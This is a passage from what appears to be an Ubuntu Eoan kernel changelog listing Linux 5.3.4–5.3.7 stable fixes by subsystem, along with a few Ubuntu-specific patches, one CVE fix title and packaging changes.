      tcpm_fw_get_caps()
    - usb: typec: ucsi: ccg: Remove run_isr flag
    - usb: typec: ucsi: displayport: Fix for the mode entering routine
    - USB: legousbtower: fix slab info leak at probe
    - USB: legousbtower: fix deadlock on disconnect
    - USB: legousbtower: fix potential NULL-deref on disconnect
    - USB: legousbtower: fix open after failed reset request
    - USB: legousbtower: fix use-after-free on release
    - mei: me: add comet point (lake) LP device ids
    - mei: avoid FW version request on Ibex Peak and earlier
    - gpio: eic: sprd: Fix the incorrect EIC offset when toggling
    - staging/fbtft: Depend on OF
    - staging: bcm2835-audio: Fix draining behavior regression
    - Staging: fbtft: fix memory leak in fbtft_framebuffer_alloc
    - staging: rtl8188eu: fix HighestRate check in odm_ARFBRefresh_8188E()
    - staging: vt6655: Fix memory leak in vt6655_probe
    - iio: adc: hx711: fix bug in sampling of data
    - iio: adc: ad799x: fix probe error handling
    - iio: adc: axp288: Override TS pin bias current for some models
    - iio: adc: stm32-adc: move registers definitions
    - iio: adc: stm32-adc: fix a race when using several adcs with dma and irq
    - iio: light: opt3001: fix mutex unlock race
    - iio: light: add missing vcnl4040 of_compatible
    - iio: accel: adxl372: Fix/remove limitation for FIFO samples
    - iio: accel: adxl372: Fix push to buffers lost samples
    - iio: accel: adxl372: Perform a reset at start up
    - efivar/ssdt: Don't iterate over EFI vars if no SSDT override was specified
    - perf llvm: Don't access out-of-scope array
    - perf inject jit: Fix JIT_CODE_MOVE filename
    - drm/i915: Perform GGTT restore much earlier during resume
    - selinux: fix context string corruption in convert_context()
    - CIFS: Gracefully handle QueryInfo errors during open
    - CIFS: Force revalidate inode when dentry is stale
    - CIFS: Force reval dentry if LOOKUP_REVAL flag is set
    - cifs: use cifsInodeInfo->open_file_lock while iterating to avoid a panic
    - kernel/sysctl.c: do not override max_threads provided by userspace
    - mm/z3fold.c: claim page in the beginning of free
    - mm/page_alloc.c: fix a crash in free_pages_prepare()
    - mm/vmpressure.c: fix a signedness bug in vmpressure_register_event()
    - IB/core: Fix wrong iterating on ports
    - firmware: google: increment VPD key_len properly
    - gpio: fix getting nonexclusive gpiods from DT
    - gpiolib: don't clear FLAG_IS_OUT when emulating open-drain/open-source
    - btrfs: relocation: fix use-after-free on dead relocation roots
    - btrfs: allocate new inode in NOFS context
    - btrfs: fix balance convert to single on 32-bit host CPUs
    - Btrfs: fix memory leak due to concurrent append writes with fiemap
    - btrfs: fix incorrect updating of log root tree
    - btrfs: fix uninitialized ret in ref-verify
    - NFS: Fix O_DIRECT accounting of number of bytes read/written
    - MIPS: Disable Loongson MMI instructions for kernel build
    - MIPS: elf_hwcap: Export userspace ASEs
    - RDMA/vmw_pvrdma: Free SRQ only once
    - ACPI/PPTT: Add support for ACPI 6.3 thread flag
    - arm64: topology: Use PPTT to determine if PE is a thread
    - iio: light: fix vcnl4000 devicetree hooks
    - Fix the locking in dcache_readdir() and friends
    - drm/i915: Bump skl+ max plane width to 5k for linear/x-tiled
    - drm/i915: Whitelist COMMON_SLICE_CHICKEN2
    - drm/i915: Mark contents as dirty on a write fault
    - drm/msm: Use the correct dma_sync calls harder
    - media: stkwebcam: fix runtime PM after driver unbind
    - arm64/sve: Fix wrong free for task->thread.sve_state
    - tracing/hwlat: Report total time spent in all NMIs during the sample
    - tracing/hwlat: Don't ignore outer-loop duration when calculating max_latency
    - ftrace: Get a reference counter for the trace_array on filter files
    - tracing: Get trace_array reference for available_tracers files
    - hwmon: Fix HWMON_P_MIN_ALARM mask
    - mtd: rawnand: au1550nd: Fix au_read_buf16() prototype
    - x86/asm: Fix MWAITX C-state hint value
    - io_uring: only flush workqueues on fileset removal
    - efi/tpm: Fix sanity check of unsigned tbl_size being less than zero
    - Linux 5.3.7
    - [Packaging] Remove now un-used modules for amd64
    - [Config] Remove Rio500
    - [Config] Remove deselected modules

* Eoan update: v5.3.5 upstream stable release (LP: #1848047)
    - drm/vkms: Fix crc worker races
    - drm/mcde: Fix uninitialized variable
    - drm/bridge: tc358767: Increase AUX transfer length limit
    - drm/vkms: Avoid assigning 0 for possible_crtc
    - drm/panel: simple: fix AUO g185han01 horizontal blanking
    - drm/amd/display: add monitor patch to add T7 delay
    - drm/amd/display: Power-gate all DSCs at driver init time
    - drm/amd/display: fix not calling ppsmu to trigger PME
    - drm/amd/display: Clear FEC_READY shadow register if DPCD write fails
    - drm/amd/display: Copy GSL groups when committing a new context
    - video: ssd1307fb: Start page range at page_offset
    - drm/tinydrm/Kconfig: drivers: Select BACKLIGHT_CLASS_DEVICE
    - drm/stm: attach gem fence to atomic state
    - drm/bridge: sii902x: fix missing reference to mclk clock
    - drm/panel: check failure cases in the probe func
    - drm/rockchip: Check for fast link training before enabling psr
    - drm/amdgpu: Fix hard hang for S/G display BOs.
    - drm/amd/display: Use proper enum conversion functions
    - drm/radeon: Fix EEH during kexec
    - gpu: drm: radeon: Fix a possible null-pointer dereference in
      radeon_connector_set_property()
    - clk: imx8mq: Mark AHB clock as critical
    - PCI: rpaphp: Avoid a sometimes-uninitialized warning
    - pinctrl: stmfx: update pinconf settings
    - ipmi_si: Only schedule continuously in the thread in maintenance mode
    - clk: qoriq: Fix -Wunused-const-variable
    - clk: ingenic/jz4740: Fix "pll half" divider not read/written properly
    - clk: sunxi-ng: v3s: add missing clock slices for MMC2 module clocks
    - drm/amd/display: fix issue where 252-255 values are clipped
    - drm/amd/display: Fix frames_to_insert math
    - drm/amd/display: reprogram VM config when system resume
    - drm/amd/display: Register VUPDATE_NO_LOCK interrupts for DCN2
    - powerpc/powernv/ioda2: Allocate TCE table levels on demand for default DMA
      window
    - clk: actions: Don't reference clk_init_data after registration
    - clk: sirf: Don't reference clk_init_data after registration
    - clk: meson: axg-audio: Don't reference clk_init_data after registration
    - clk: sprd: Don't reference clk_init_data after registration
    - clk: zx296718: Don't reference clk_init_data after registration
    - clk: sunxi: Don't call clk_hw_get_name() on a hw that isn't registered
    - powerpc/xmon: Check for HV mode when dumping XIVE info from OPAL
    - powerpc/rtas: use device model APIs and serialization during LPM
    - powerpc/ptdump: fix walk_pagetables() address mismatch
    - powerpc/futex: Fix warning: 'oldval' may be used uninitialized in this
      function
    - powerpc/64s/radix: Fix memory hotplug section page table creation
    - powerpc/pseries/mobility: use cond_resched when updating device tree
    - powerpc/perf: fix imc allocation failure handling
    - pinctrl: tegra: Fix write barrier placement in pmx_writel
    - powerpc/eeh: Clear stale EEH_DEV_NO_HANDLER flag
    - vfio_pci: Restore original state on release
    - drm/amdgpu/sdma5: fix number of sdma5 trap irq types for navi1x
    - drm/nouveau/kms/tu102-: disable input lut when input is already FP16
    - drm/nouveau/volt: Fix for some cards having 0 maximum voltage
    - pinctrl: amd: disable spurious-firing GPIO IRQs
    - clk: renesas: mstp: Set GENPD_FLAG_ALWAYS_ON for clock domain
    - clk: renesas: cpg-mssr: Set GENPD_FLAG_ALWAYS_ON for clock domain
    - drm/amd/display: support spdif
    - drm/amd/powerpaly: fix navi series custom peak level value error
    - drm/amd/display: fix MPO HUBP underflow with Scatter Gather
    - drm/amd/display: fix trigger not generated for freesync
    - selftests/powerpc: Retry on host facility unavailable
    - kbuild: Do not enable -Wimplicit-fallthrough for clang for now
    - drm/amdgpu/si: fix ASIC tests
    - powerpc/64s/exception: machine check use correct cfar for late handler
    - pstore: fs superblock limits
    - powerpc/eeh: Clean up EEH PEs after recovery finishes
    - clk: qcom: gcc-sdm845: Use floor ops for sdcc clks
    - powerpc/pseries: correctly track irq state in default idle
    - pinctrl: meson-gxbb: Fix wrong pinning definition for uart_c
    - mailbox: mediatek: cmdq: clear the event in cmdq initial flow
    - ARM: dts: dir685: Drop spi-cpol from the display
    - arm64: fix unreachable code issue with cmpxchg
    - clk: at91: select parent if main oscillator or bypass is enabled
    - clk: imx: pll14xx: avoid glitch when set rate
    - clk: imx: clk-pll14xx: unbypass PLL by default
    - clk: Make clk_bulk_get_all() return a valid "id"
    - powerpc: dump kernel log before carrying out fadump or kdump
    - mbox: qcom: add APCS child device for QCS404
    - clk: sprd: add missing kfree
    - scsi: core: Reduce memory required for SCSI logging
    - dma-buf/sw_sync: Synchronize signal vs syncpt free
    - f2fs: fix to drop meta/node pages during umount
    - ext4: fix potential use after free after remounting with noblock_validity
    - MIPS: Ingenic: Disable broken BTB lookup optimization.
    - MIPS: Don't use bc_false uninitialized in __mm_isBranchInstr
    - MIPS: tlbex: Explicitly cast _PAGE_NO_EXEC to a boolean
    - i2c-cht-wc: Fix lockdep warning
    - PCI: tegra: Fix OF node reference leak
    - HID: wacom: Fix several minor compiler warnings
    - rtc: bd70528: fix driver dependencies
    - mips/atomic: Fix loongson_llsc_mb() wreckage
    - PCI: pci-hyperv: Fix build errors on non-SYSFS config
    - PCI: layerscape: Add the bar_fixed_64bit property to the endpoint driver
    - livepatch: Nullify obj->mod in klp_module_coming()'s error path
    - mips/atomic: Fix smp_mb__{before,after}_atomic()
    - ARM: 8898/1: mm: Don't treat faults reported from cache maintenance as
      writes
    - soundwire: intel: fix channel number reported by hardware
    - PCI: mobiveil: Fix the CPU base address setup in inbound window
    - ARM: 8875/1: Kconfig: default to AEABI w/ Clang
    - rtc: snvs: fix possible race condition
    - rtc: pcf85363/pcf85263: fix regmap error in set_time
    - power: supply: register HWMON devices with valid names
    - selinux: fix residual uses of current_security() for the SELinux blob
    - PCI: Add pci_info_ratelimited() to ratelimit PCI separately
    - HID: apple: Fix stuck function keys when using FN
    - PCI: rockchip: Propagate errors for optional regulators
    - PCI: histb: Propagate errors for optional regulators
    - PCI: imx6: Propagate errors for optional regulators
    - PCI: exynos: Propagate errors for optional PHYs
    - security: smack: Fix possible null-pointer dereferences in
      smack_socket_sock_rcv_skb()
    - PCI: Use static const struct, not const static struct
    - ARM: 8905/1: Emit __gnu_mcount_nc when using Clang 10.0.0 or newer
    - ARM: 8903/1: ensure that usable memory in bank 0 starts from a PMD-aligned
      address
    - i2c: tegra: Move suspend handling to NOIRQ phase
    - block, bfq: push up injection only after setting service time
    - fat: work around race with userspace's read via blockdev while mounting
    - pktcdvd: remove warning on attempting to register non-passthrough dev
    - hypfs: Fix error number left in struct pointer member
    - tools/power/x86/intel-speed-select: Fix high priority core mask over count
    - crypto: hisilicon - Fix double free in sec_free_hw_sgl()
    - mm: add dummy can_do_mlock() helper
    - kbuild: clean compressed initramfs image
    - ocfs2: wait for recovering done after direct unlock request
    - kmemleak: increase DEBUG_KMEMLEAK_EARLY_LOG_SIZE default to 16K
    - arm64: consider stack randomization for mmap base only when necessary
    - mips: properly account for stack randomization and stack guard gap
    - arm: properly account for stack randomization and stack guard gap
    - arm: use STACK_TOP when computing mmap base address
    - cxgb4:Fix out-of-bounds MSI-X info array access
    - erspan: remove the incorrect mtu limit for erspan
    - hso: fix NULL-deref on tty open
    - ipv6: drop incoming packets having a v4mapped source address
    - ipv6: Handle missing host route in __ipv6_ifa_notify
    - net: ipv4: avoid mixed n_redirects and rate_tokens usage
    - net: qlogic: Fix memory leak in ql_alloc_large_buffers
    - net: sched: taprio: Fix potential integer overflow in
      taprio_set_picos_per_byte
    - net: Unpublish sk from sk_reuseport_cb before call_rcu
    - nfc: fix memory leak in llcp_sock_bind()
    - qmi_wwan: add support for Cinterion CLS8 devices
    - rxrpc: Fix rxrpc_recvmsg tracepoint
    - sch_cbq: validate TCA_CBQ_WRROPT to avoid crash
    - sch_dsmark: fix potential NULL deref in dsmark_init()
    - tipc: fix unlimited bundling of small messages
    - udp: fix gso_segs calculations
    - vsock: Fix a lockdep warning in __vsock_release()
    - net: dsa: rtl8366: Check VLAN ID and not ports
    - tcp: adjust rto_base in retransmits_timed_out()
    - udp: only do GSO if # of segs > 1
    - net/rds: Fix error handling in rds_ib_add_one()
    - net: dsa: sja1105: Initialize the meta_lock
    - xen-netfront: do not use ~0U as error return value for xennet_fill_frags()
    - net: dsa: sja1105: Fix sleeping while atomic in .port_hwtstamp_set
    - ptp_qoriq: Initialize the registers' spinlock before calling
      ptp_qoriq_settime
    - net: dsa: sja1105: Ensure PTP time for rxtstamp reconstruction is not in the
      past
    - net: dsa: sja1105: Prevent leaking memory
    - net: socionext: netsec: always grab descriptor lock
    - net: sched: cbs: Avoid division by zero when calculating the port rate
    - net: sched: taprio: Avoid division by zero on invalid link speed
    - Smack: Don't ignore other bprm->unsafe flags if LSM_UNSAFE_PTRACE is set
    - smack: use GFP_NOFS while holding inode_smack::smk_lock
    - dm raid: fix updating of max_discard_sectors limit
    - dm zoned: fix invalid memory access
    - NFC: fix attrs checks in netlink interface
    - kexec: bail out upon SIGKILL when allocating memory.
    - KVM: hyperv: Fix Direct Synthetic timers assert an interrupt w/o
      lapic_in_kernel
    - 9p/cache.c: Fix memory leak in v9fs_cache_session_get_cookie
    - vfs: set fs_context::user_ns for reconfigure
    - Linux 5.3.5
    - [Config] add rtc-bd70528 to modules.ignore
    - [Packaging] remove rtc-bd70528 from modules

* Suspend stopped working from 4.4.0-157 onwards (LP: #1844021) // Eoan
    update: 5.3.7 upstream stable release (LP: #1848750)
    - xhci: Increase STS_SAVE timeout in xhci_suspend()

* CVE-2019-17666
    - SAUCE: rtlwifi: Fix potential overflow on P2P code

* md raid0/linear doesn't show error state if an array member is removed and
    allows successful writes (LP: #1847773)
    - md raid0/linear: Mark array as 'broken' and fail BIOs if a member is gone

* linux won't build when new virtualbox version is present on the archive
    (LP: #1848788)
    - [Packaging]: download virtualbox from sources

* seccomp: add SECCOMP_USER_NOTIF_FLAG_CONTINUE    (LP: #1847744)
    - SAUCE: seccomp: add SECCOMP_USER_NOTIF_FLAG_CONTINUE
    - SAUCE: seccomp: test SECCOMP_USER_NOTIF_FLAG_CONTINUE

* Change Config Option CONFIG_MEMORY_HOTPLUG_DEFAULT_ONLINE for s390x from yes
    to no (LP: #1848492)
    - [Config] Change Config Option CONFIG_MEMORY_HOTPLUG_DEFAULT_ONLINE for s390x
      from yes to no

* shiftfs: rework how shiftfs opens files (LP: #1846265)
    - SAUCE: shiftfs: rework how shiftfs opens files

* fdatasync performance regression on 5.0 kernels (LP: #1847641)
    - blk-wbt: fix performance regression in wbt scale_up/scale_down

* bcache: Performance degradation when querying priority_stats (LP: #1840043)
    - bcache: add cond_resched() in __bch_cache_cmp()

* drm/i915: Fix the issue of "azx_get_response timeout" for hdmi audio on ICL
    platforms (LP: #1847192)
    - SAUCE: drm/i915: Fix audio power up sequence for gen10+ display
    - SAUCE: drm/i915: extend audio CDCLK>=2*BCLK constraint to more platforms

* Add installer support for iwlmvm adapters (LP: #1848236)
    - d-i: Add iwlmvm to nic-modules

* Eoan update: v5.3.6 upstream stable release (LP: #1848039)
    - s390/process: avoid potential reading of freed stack
    - KVM: s390: Test for bad access register and size at the start of S390_MEM_OP
    - s390/topology: avoid firing events before kobjs are created
    - s390/cio: avoid calling strlen on null pointer
    - s390/cio: exclude subchannels with no parent from pseudo check
    - KVM: s390: fix __insn32_query() inline assembly
    - KVM: PPC: Book3S: Enable XIVE native capability only if OPAL has required
      functions
    - KVM: PPC: Book3S HV: XIVE: Free escalation interrupts before disabling the
      VP
    - KVM: PPC: Book3S HV: Don't push XIVE context when not using XIVE device
    - KVM: PPC: Book3S HV: Fix race in re-enabling XIVE escalation interrupts
    - KVM: PPC: Book3S HV: Check for MMU ready on piggybacked virtual cores
    - KVM: PPC: Book3S HV: Don't lose pending doorbell request on migration on P9
    - KVM: X86: Fix userspace set invalid CR4
    - nbd: fix max number of supported devs
    - PM / devfreq: tegra: Fix kHz to Hz conversion
    - ASoC: Define a set of DAPM pre/post-up events
    - ASoC: sgtl5000: Improve VAG power and mute control
    - powerpc/xive: Implement get_irqchip_state method for XIVE to fix shutdown
      race
    - powerpc/mce: Fix MCE handling for huge pages
    - powerpc/mce: Schedule work from irq_work
    - powerpc/603: Fix handling of the DIRTY flag
    - powerpc/32s: Fix boot failure with DEBUG_PAGEALLOC without KASAN.
    - powerpc/ptdump: Fix addresses display on PPC32
    - powerpc/powernv: Restrict OPAL symbol map to only be readable by root
    - powerpc/pseries: Fix cpu_hotplug_lock acquisition in resize_hpt()
    - powerpc/powernv/ioda: Fix race in TCE level allocation
    - powerpc/kasan: Fix parallel loading of modules.
    - powerpc/kasan: Fix shadow area set up for modules.
    - powerpc/book3s64/mm: Don't do tlbie fixup for some hardware revisions
    - powerpc/book3s64/radix: Rename CPU_FTR_P9_TLBIE_BUG feature flag
    - powerpc/mm: Add a helper to select PAGE_KERNEL_RO or PAGE_READONLY
    - powerpc/mm: Fix an Oops in kasan_mmu_init()
    - powerpc/mm: Fixup tlbie vs mtpidr/mtlpidr ordering issue on POWER9
    - can: mcp251x: mcp251x_hw_reset(): allow more time after a reset
    - tools lib traceevent: Fix "robust" test of do_generate_dynamic_list_file
    - tools lib traceevent: Do not free tep->cmdlines in add_new_comm() on failure
    - crypto: qat - Silence smp_processor_id() warning
    - crypto: skcipher - Unmap pages after an external error
    - crypto: cavium/zip - Add missing single_release()
    - crypto: caam/qi - fix error handling in ERN handler
    - crypto: caam - fix concurrency issue in givencrypt descriptor
    - crypto: ccree - account for TEE not ready to report
    - crypto: ccree - use the full crypt length value
    - MIPS: Treat Loongson Extensions as ASEs
    - power: supply: sbs-battery: use correct flags field
    - power: supply: sbs-battery: only return health when battery present
    - tracing: Make sure variable reference alias has correct var_ref_idx
    - usercopy: Avoid HIGHMEM pfn warning
    - timer: Read jiffies once when forwarding base clk
    - PCI: vmd: Fix config addressing when using bus offsets
    - PCI: hv: Avoid use of hv_pci_dev->pci_slot after freeing it
    - PCI: vmd: Fix shadow offsets to reflect spec changes
    - selftests/tpm2: Add the missing TEST_FILES assignment
    - selftests: pidfd: Fix undefined reference to pthread_create()
    - watchdog: imx2_wdt: fix min() calculation in imx2_wdt_set_timeout
    - perf tools: Fix segfault in cpu_cache_level__read()
    - perf stat: Fix a segmentation fault when using repeat forever
    - drm/i915/dp: Fix dsc bpp calculations, v5.
    - drm/atomic: Reject FLIP_ASYNC unconditionally
    - drm/atomic: Take the atomic toys away from X
    - drm: mali-dp: Mark expected switch fall-through
    - drm/omap: fix max fclk divider for omap36xx
    - drm/msm/dsi: Fix return value check for clk_get_parent
    - drm/nouveau/kms/nv50-: Don't create MSTMs for eDP connectors
    - drm/amd/powerplay: change metrics update period from 1ms to 100ms
    - drm/i915/gvt: update vgpu workload head pointer correctly
    - drm/i915: to make vgpu ppgtt notificaiton as atomic operation
    - mac80211: keep BHs disabled while calling drv_tx_wake_queue()
    - mmc: tegra: Implement ->set_dma_mask()
    - mmc: sdhci: improve ADMA error reporting
    - mmc: sdhci-of-esdhc: set DMA snooping based on DMA coherence
    - mmc: sdhci: Let drivers define their DMA mask
    - Revert "locking/pvqspinlock: Don't wait if vCPU is preempted"
    - libnvdimm/altmap: Track namespace boundaries in altmap
    - DTS: ARM: gta04: introduce legacy spi-cs-high to make display work again
    - xen/balloon: Set pages PageOffline() in balloon_add_region()
    - xen/xenbus: fix self-deadlock after killing user process
    - ieee802154: atusb: fix use-after-free at disconnect
    - nl80211: validate beacon head
    - cfg80211: validate SSID/MBSSID element ordering assumption
    - cfg80211: initialize on-stack chandefs
    - drivers: thermal: qcom: tsens: Fix memory leak from qfprom read
    - ima: always return negative code for error
    - ima: fix freeing ongoing ahash_request
    - fs: nfs: Fix possible null-pointer dereferences in encode_attrs()
    - xprtrdma: Toggle XPRT_CONGESTED in xprtrdma's slot methods
    - xprtrdma: Send Queue size grows after a reconnect
    - 9p: Transport error uninitialized
    - 9p: avoid attaching writeback_fid on mmap with type PRIVATE
    - xen/pci: reserve MCFG areas earlier
    - fuse: fix request limit
    - ceph: fix directories inode i_blkbits initialization
    - ceph: fetch cap_gen under spinlock in ceph_add_cap
    - ceph: reconnect connection if session hang in opening state
    - SUNRPC: RPC level errors should always set task->tk_rpc_status
    - watchdog: aspeed: Add support for AST2600
    - netfilter: nf_tables: allow lookups in dynamic sets
    - drm/amdgpu: Fix KFD-related kernel oops on Hawaii
    - drm/amdgpu: Check for valid number of registers to read
    - perf probe: Fix to clear tev->nargs in clear_probe_trace_event()
    - pNFS: Ensure we do clear the return-on-close layout stateid on fatal errors
    - SUNRPC: Don't try to parse incomplete RPC messages
    - pwm: stm32-lp: Add check in case requested period cannot be achieved
    - selftests/seccomp: fix build on older kernels
    - x86/purgatory: Disable the stackleak GCC plugin for the purgatory
    - ntb: point to right memory window index
    - thermal: Fix use-after-free when unregistering thermal zone device
    - thermal_hwmon: Sanitize thermal_zone type
    - iommu/amd: Fix downgrading default page-sizes in alloc_pte()
    - libnvdimm/region: Initialize bad block for volatile namespaces
    - libnvdimm: Fix endian conversion issues
    - fuse: fix memleak in cuse_channel_open
    - libnvdimm/nfit_test: Fix acpi_handle redefinition
    - sched/membarrier: Call sync_core only before usermode for same mm
    - sched/membarrier: Fix private expedited registration check
    - sched/core: Fix migration to invalid CPU in __set_cpus_allowed_ptr()
    - perf build: Add detection of java-11-openjdk-devel package
    - include/trace/events/writeback.h: fix -Wstringop-truncation warnings
    - selftests/bpf: adjust strobemeta loop to satisfy latest clang
    - kernel/elfcore.c: include proper prototypes
    - libbpf: fix false uninitialized variable warning
    - blk-mq: move lockdep_assert_held() into elevator_exit
    - bpf: Fix bpf_event_output re-entry issue
    - net: dsa: microchip: Always set regmap stride to 1
    - perf unwind: Fix libunwind build failure on i386 systems
    - mlxsw: spectrum_flower: Fail in case user specifies multiple mirror actions
    - nfp: abm: fix memory leak in nfp_abm_u32_knode_replace
    - drm/radeon: Bail earlier when radeon.cik_/si_support=0 is passed
    - Btrfs: fix selftests failure due to uninitialized i_mode in test inodes
    - KVM: nVMX: Fix consistency check on injected exception error code
    - tick: broadcast-hrtimer: Fix a race in bc_set_next
    - perf stat: Reset previous counts on repeat with interval
    - riscv: Avoid interrupts being erroneously enabled in handle_exception()
    - vfs: Fix EOVERFLOW testing in put_compat_statfs64
    - coresight: etm4x: Use explicit barriers on enable/disable
    - staging: erofs: fix an error handling in erofs_readdir()
    - staging: erofs: some compressed cluster should be submitted for corrupted
      images
    - staging: erofs: add two missing erofs_workgroup_put for corrupted images
    - staging: erofs: avoid endless loop of invalid lookback distance 0
    - staging: erofs: detect potential multiref due to corrupted images
    - libnvdimm: prevent nvdimm from requesting key when security is disabled
    - Linux 5.3.6

* Eoan update: v5.3.4 upstream stable release (LP: #1848046)
    - arcnet: provide a buffer big enough to actually receive packets
    - cdc_ncm: fix divide-by-zero caused by invalid wMaxPacketSize
    - macsec: drop skb sk before calling gro_cells_receive
    - net/phy: fix DP83865 10 Mbps HDX loopback disable function
    - net: qrtr: Stop rx_worker before freeing node
    - net/sched: act_sample: don't push mac header on ip6gre ingress
    - net_sched: add max len check for TCA_KIND
    - net: stmmac: Fix page pool size
    - nfp: flower: fix memory leak in nfp_flower_spawn_vnic_reprs
    - nfp: flower: prevent memory leak in nfp_flower_spawn_phy_reprs
    - openvswitch: change type of UPCALL_PID attribute to NLA_UNSPEC
    - ppp: Fix memory leak in ppp_write
    - sch_netem: fix a divide by zero in tabledist()
    - selftests: Update fib_tests to handle missing ping6
    - skge: fix checksum byte order
    - tcp_bbr: fix quantization code to not raise cwnd if not probing bandwidth
    - usbnet: ignore endpoints with invalid wMaxPacketSize
    - usbnet: sanity checking of packet sizes and device mtu
    - net/rds: Check laddr_check before calling it
    - net/mlx5e: Fix matching on tunnel addresses type
    - ipv6: fix a typo in fib6_rule_lookup()
    - selftests: Update fib_nexthop_multiprefix to handle missing ping6
    - net: phy: micrel: add Asym Pause workaround for KSZ9021
    - net/sched: cbs: Fix not adding cbs instance to list
    - ipv4: Revert removal of rt_uses_gateway
    - net_sched: add policy validation for action attributes
    - vrf: Do not attempt to create IPv6 mcast rule if IPv6 is disabled
    - net/mlx5e: Fix traffic duplication in ethtool steering
    - net: sched: fix possible crash in tcf_action_destroy()
    - tcp: better handle TCP_USER_TIMEOUT in SYN_SENT state
    - net/mlx5: Add device ID of upcoming BlueField-2
    - ALSA: hda: Flush interrupts on disabling
    - ASoC: SOF: Intel: hda: Make hdac_device device-managed
    - cpufreq: ap806: Add NULL check after kcalloc
    - ALSA: hda/hdmi - Don't report spurious jack state changes
    - regulator: lm363x: Fix off-by-one n_voltages for lm3632 ldo_vpos/ldo_vneg
    - regulator: lm363x: Fix n_voltages setting for lm36274
    - spi: dw-mmio: Clock should be shut when error occurs
    - ASoC: tlv320aic31xx: suppress error message for EPROBE_DEFER
    - ASoC: sgtl5000: Fix of unmute outputs on probe
    - ASoC: sgtl5000: Fix charge pump source assignment
    - firmware: qcom_scm: Use proper types for dma mappings
    - dmaengine: bcm2835: Print error in case setting DMA mask fails
    - leds: leds-lp5562 allow firmware files up to the maximum length
    - ASoC: SOF: reset DMA state in prepare
    - media: dib0700: fix link error for dibx000_i2c_set_speed
    - media: mtk-cir: lower de-glitch counter for rc-mm protocol
    - ASoC: SOF: pci: mark last_busy value at runtime PM init
    - media: exynos4-is: fix leaked of_node references
    - media: vivid:add sanity check to avoid divide error and set value to 1 if 0.
    - media: vb2: reorder checks in vb2_poll()
    - media: vivid: work around high stack usage with clang
    - media: hdpvr: Add device num check and handling
    - media: i2c: ov5640: Check for devm_gpiod_get_optional() error
    - time/tick-broadcast: Fix tick_broadcast_offline() lockdep complaint
    - sched/fair: Fix imbalance due to CPU affinity
    - sched/core: Fix CPU controller for !RT_GROUP_SCHED
    - x86/apic: Make apic_pending_intr_clear() more robust
    - sched/deadline: Fix bandwidth accounting at all levels after offline
      migration
    - x86/reboot: Always use NMI fallback when shutdown via reboot vector IPI
      fails
    - rcu/tree: Call setschedule() gp ktread to SCHED_FIFO outside of atomic
      region
    - x86/apic: Soft disable APIC before initializing it
    - ALSA: hda - Show the fatal CORB/RIRB error more clearly
    - ALSA: i2c: ak4xxx-adda: Fix a possible null pointer dereference in
      build_adc_controls()
    - rcu: Add destroy_work_on_stack() to match INIT_WORK_ONSTACK()
    - EDAC/mc: Fix grain_bits calculation
    - arm64: dts: imx8mq: Correct OPP table according to latest datasheet
    - media: iguanair: add sanity checks
    - cpuidle: teo: Allow tick to be stopped if PM QoS is used
    - gpio: madera: Add support for Cirrus Logic CS47L15
    - gpio: madera: Add support for Cirrus Logic CS47L92
    - arm64: mm: free the initrd reserved memblock in a aligned manner
    - soc: amlogic: meson-clk-measure: protect measure with a mutex
    - base: soc: Export soc_device_register/unregister APIs
    - ALSA: usb-audio: Skip bSynchAddress endpoint check if it is invalid
    - ia64:unwind: fix double free for mod->arch.init_unw_table
    - EDAC/altera: Use the proper type for the IRQ status bits
    - ASoC: rsnd: don't call clk_get_rate() under atomic context
    - arm64/prefetch: fix a -Wtype-limits warning
    - md/raid1: end bio when the device faulty
    - md: don't call spare_active in md_reap_sync_thread if all member devices
      can't work
    - md: don't set In_sync if array is frozen
    - media: media/platform: fsl-viu.c: fix build for MICROBLAZE
    - media: staging: tegra-vde: Fix build error
    - RAS: Build debugfs.o only when enabled in Kconfig
    - ASoC: hdac_hda: fix page fault issue by removing race
    - ACPI / processor: don't print errors for processorIDs == 0xff
    - loop: Add LOOP_SET_DIRECT_IO to compat ioctl
    - perf tools: Fix paths in include statements
    - EDAC, pnd2: Fix ioremap() size in dnv_rd_reg()
    - efi: cper: print AER info of PCIe fatal error
    - firmware: arm_scmi: Check if platform has released shmem before using
    - sched/fair: Use rq_lock/unlock in online_fair_sched_group
    - idle: Prevent late-arriving interrupts from disrupting offline
    - blk-mq: Fix memory leak in blk_mq_init_allocated_queue error handling
    - media: gspca: zero usb_buf on error
    - perf config: Honour $PERF_CONFIG env var to specify alternate .perfconfig
    - perf test vfs_getname: Disable ~/.perfconfig to get default output
    - media: mtk-mdp: fix reference count on old device tree
    - media: i2c: tda1997x: prevent potential NULL pointer access
    - media: fdp1: Reduce FCP not found message level to debug
    - media: em28xx: modules workqueue not inited for 2nd device
    - arm64/efi: Move variable assignments after SECTIONS
    - perf unwind: Fix libunwind when tid != pid
    - media: rc: imon: Allow iMON RC protocol for ffdc 7e device
    - dmaengine: iop-adma: use correct printk format strings
    - ARM: xscale: fix multi-cpu compilation
    - perf record: Support aarch64 random socket_id assignment
    - media: vsp1: fix memory leak of dl on error return path
    - media: i2c: ov5645: Fix power sequence
    - media: omap3isp: Don't set streaming state on random subdevs
    - media: imx: mipi csi-2: Don't fail if initial state times-out
    - kasan/arm64: fix CONFIG_KASAN_SW_TAGS && KASAN_INLINE
    - net: lpc-enet: fix printk format strings
    - m68k: Prevent some compiler warnings in Coldfire builds
    - ARM: dts: imx7d: cl-som-imx7: make ethernet work again
    - arm64: dts: qcom: qcs404-evb: Mark WCSS clocks protected
    - ARM: dts: imx7-colibri: disable HS400
    - x86/platform/intel/iosf_mbi Rewrite locking
    - media: radio/si470x: kill urb on error
    - media: hdpvr: add terminating 0 at end of string
    - ASoC: uniphier: Fix double reset assersion when transitioning to suspend
      state
    - powerpc/Makefile: Always pass --synthetic to nm if supported
    - tools headers: Fixup bitsperlong per arch includes
    - ASoC: sun4i-i2s: Don't use the oversample to calculate BCLK
    - ASoC: mchp-i2s-mcc: Wait for RX/TX RDY only if controller is running
    - led: triggers: Fix a memory leak bug
    - ASoC: mchp-i2s-mcc: Fix unprepare of GCLK
    - nbd: add missing config put
    - ACPI / APEI: Release resources if gen_pool_add() fails
    - arm64: entry: Move ct_user_exit before any other exception
    - s390/kasan: provide uninstrumented __strlen
    - media: mceusb: fix (eliminate) TX IR signal length limit
    - media: dvb-frontends: use ida for pll number
    - posix-cpu-timers: Sanitize bogus WARNONS
    - media: dvb-core: fix a memory leak bug
    - EDAC/amd64: Support more than two controllers for chip selects handling
    - cpufreq: imx-cpufreq-dt: Add i.MX8MN support
    - libperf: Fix alignment trap with xyarray contents in 'perf stat'
    - EDAC/amd64: Recognize DRAM device type ECC capability
